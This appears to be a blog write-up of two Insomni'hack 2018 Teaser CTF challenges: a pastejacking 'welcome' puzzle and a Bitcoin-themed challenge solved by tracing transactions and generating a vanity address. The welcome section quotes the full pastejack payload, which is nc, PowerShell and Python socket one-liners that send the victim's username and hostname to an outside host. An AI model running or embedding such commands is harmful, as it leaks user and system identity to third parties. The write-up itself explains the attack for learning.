Insomni'hack Teaser 2018 Writeup: Welcome and Hax4Bitcoins

This past weekend was the Insomni'hack 2018 Teaser CTF, that leads up to the in-person 2018 Insomni'hack CTF. I got to play for a few hours this weekend and managed to solve a fun challenge involving Bitcoin transactions. To kick things off they had a welcome challenge that seemed straight forward enough:

However, if you copy and paste this text, you realize it's been weaponized as a pastejacking attack:

echo "$(whoami)@$(hostname)"|nc welcome.teaser.insomnihack.ch 42351 say you have been pwned powershell -noprofile -command "$c=New-Object -TypeName System.Net.Sockets.TcpClient;$c.Connect('welcome.teaser.insomnihack.ch', 42351);$w=New-Object System.IO.StreamWriter($c.GetStream());$w.WriteLine(\"$(whoami)\")|Out-Null;$w.Close();$c.Close();" exec("""from socket import *\nimport platform, getpass\ns=socket(AF_INET, SOCK_STREAM)\ns.connect(("welcome.teaser.insomnihack.ch",42351))\ns.sendall("{0}@{1}[{2}]".format(getpass.getuser(),platform.node(),platform.system()).encode("utf-8"))\ns.close()""") clear||cls nc welcome.teaser.insomnihack.ch 42513

While you shouldn't run those commands, it could be a lot worse as this attack does is send your username and hostname back to the ctf organizers for their "wall of sheep". If you connect to any of those ports in the pastejack attack you are greeted with a troll message, but if you connect to the original port displayed, 42315, you get the flag:

The next challenge, Hax4Bitcoins was pretty awesome. The creators set up a faux website where people can pay Bitcoin to have certain targets hacked, once the bounties reach their goal. I thought this was a pretty funny theme and my gut intuition was to check the transaction history to see who funded these hacks.

The site features a number of targets and each uses their own novelty bounty address for funding. Further, at the bottom of the page you can explicitly see the vanity addresses that the owners have claimed "dibs" on, "1Hax4B".

Following the trail of Bitcoin transactions to and from these "bounty addresses", we come across a vanity address w/ the name of "pastebin", in the bitcoin address:

When we browse to the Pastebin page at this location, we find a special Bitcoin "signed message" from the original bounty address holder:

The signatures all checkout and this was a pretty cool introduction to Bitcoin message signing and verification for me. This confirms the person who signed this Pastebin is the same as the one who owns the "bounty address".

The message tells us about a secret admin login site, however when you browse to this admin login portal, it requires a bit of extra authentication. It seems we have to pass a challenge and response protocol. This was pretty reminiscent of some Bitcoin address authentication based challenge and response protocols. Further, the hint and challenge suggest we need 1Hax4B vanity address to continue.

So the next logical step was to produce one of their special vanity Bitcoin addresses, "1Hax4B". If you go back to prior screenshots, they had claimed "dibs" on all of these addresses. I chose to use the tool govanity, a GoLang based vanity Bitcoin address generator, in an attempt to generate my own "1Hax4B" address. It took a few hours to generate, as expected, and in the end I was the proud owner of a new vanity Bitcoin address: